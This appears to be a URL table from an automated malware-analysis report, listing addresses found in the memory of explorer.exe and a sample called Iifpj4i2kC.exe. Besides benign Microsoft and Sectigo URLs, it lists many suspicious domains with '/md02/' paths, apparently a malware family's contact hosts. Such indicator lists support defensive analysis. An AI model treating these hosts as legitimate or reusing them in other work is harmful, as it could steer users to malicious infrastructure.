http://www.chiri.latReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.33mgbet.com/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.tdshomesolution.com/md02/www.onsen1508.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.comM	explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rakring.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.33mgbet.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hecxion.xyz/md02/www.mamasprinkleofjoy.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.onsen1508.com/md02/www.barnesassetrecovery.store	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zbbnp.xyzReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rslotrank.winReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rslotrank.win/md02/www.partymaxclubmen36.click	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.upcyclecharms.com/md02/www.hecxion.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://www.mamasprinkleofjoy.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/e	explorer.exe, 00000006.00000002.4566997976.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	Iifpj4i2kC.exe	false	URL Reputation: safe	unknown
http://www.hecxion.xyzReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000003.2980304838.000000000C405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000C3E8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zbbnp.xyz/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hecxion.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.tdshomesolution.com/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mamasprinkleofjoy.com/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.tdshomesolution.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.barnesassetrecovery.storeReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rakring.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.33mgbet.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.partymaxclubmen36.click/md02/www.tdshomesolution.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.upcyclecharms.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	Iifpj4i2kC.exe	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000002.4575208679.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.upcyclecharms.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.come	explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zruypj169g.topReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zruypj169g.top/md02/www.teplo-invest.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.chiri.lat/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hecxion.xyz/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/I	explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://ocsp.sectigo.com0	Iifpj4i2kC.exe	false	URL Reputation: safe	unknown
http://www.tdshomesolution.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.chiri.lat	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.barnesassetrecovery.store/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000006.00000000.2133543860.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565658738.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565685064.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.onsen1508.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rslotrank.win/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mamasprinkleofjoy.com/md02/www.rakring.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	Iifpj4i2kC.exe	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.chiri.lat/md02/www.rslotrank.win	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.33mgbet.com/md02/www.a1b5v.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.a1b5v.xyzReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.upcyclecharms.com/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
